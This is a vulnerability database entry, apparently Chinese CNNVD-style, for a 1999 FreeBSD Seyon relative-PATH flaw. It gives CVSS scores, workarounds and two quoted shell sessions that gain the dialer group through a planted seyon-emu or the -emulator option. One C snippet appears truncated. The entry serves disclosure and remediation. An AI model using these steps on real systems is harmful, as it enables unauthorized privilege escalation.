发布时间 :1999-12-01 00:00:00
修订时间 :2008-09-09 08:35:41

[原文]FreeBSD seyon allows users to gain privileges via a modified PATH variable for finding the xterm and seyon-emu commands.

[CNNVD]FreeBSD Seyon设置组标识符拨号装置漏洞(CNNVD-199912-012)


- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

FreeBSD Seyon设置组标识符拨号装置漏洞
中危 配置错误
1999-12-01 00:00:00 2005-05-02 00:00:00

- 公告与补丁

        Remove the setgid bit from seyon.

- 漏洞信息 (19609)

Muhammad M. Saggaf Seyon 2.14 b Relative Path Vulnerability (EDBID:19609)
freebsd local
1999-11-08 Verified
0 Shawn Hillis
N/A [点击下载]

Seyon uses relative pathnames to spawn two other programs which it requires. It is possible to exploit this vulnerability to obtain the priviliges which seyon runs with. It is installed (by default) setgid dialer on FreeBSD and root on Irix. 

bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999=
= i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat > seyonx.c
void main () {
setregid(getegid(), getegid());
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)


- 漏洞信息

FreeBSD seyon PATH Variable Subversion Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

FreeBSD contains the port seyon, which is flawed and may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a malicious user places a fake "seyon-emu" or "xterm" in a newly created directory and sets its PATH. Envoking seyon will cause seyon to search the value in $PATH for "xterm" and "seyon-emu" and once it locates either one, the fake will be executed by seyon with seyon privileges. This flaw may lead to a loss of integrity.

- 时间线

1999-11-08 Unknow
1999-11-08 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: chmod 750 `which seyon` and add selected users to the "dialer" group.

- 相关参考

- 漏洞作者

- 漏洞信息

FreeBSD Seyon setgid dialer Vulnerability
Configuration Error 838
No Yes
1999-12-01 12:00:00 2009-07-11 12:56:00
First posted to BugTraq by Brock Tellier <> on December 1, 1999.

- 受影响的程序版本

FreeBSD FreeBSD 3.3

- 漏洞讨论

FreeBSD 3.3-RELEASE ships with Seyon, a communications program which is known to have several vulnerabilities which can allow for a malicious user to elevate priviliges. The vulnerability, however, is that seyon is still installed setgid dialer in FreeBSD. When seyon is exploited, a local user can grant him/herself priviliges which allow access to the communications devices or anything else accessable by the group dialer.

- 漏洞利用

One of the methods to exploit seyon is shown below:

bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' &gt; id.c
bash-2.03$ gcc -o id id.c
bash-2.03$ seyon -emulator ./id
uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)

- 解决方案

Remove the setgid bit from seyon.

- 相关参考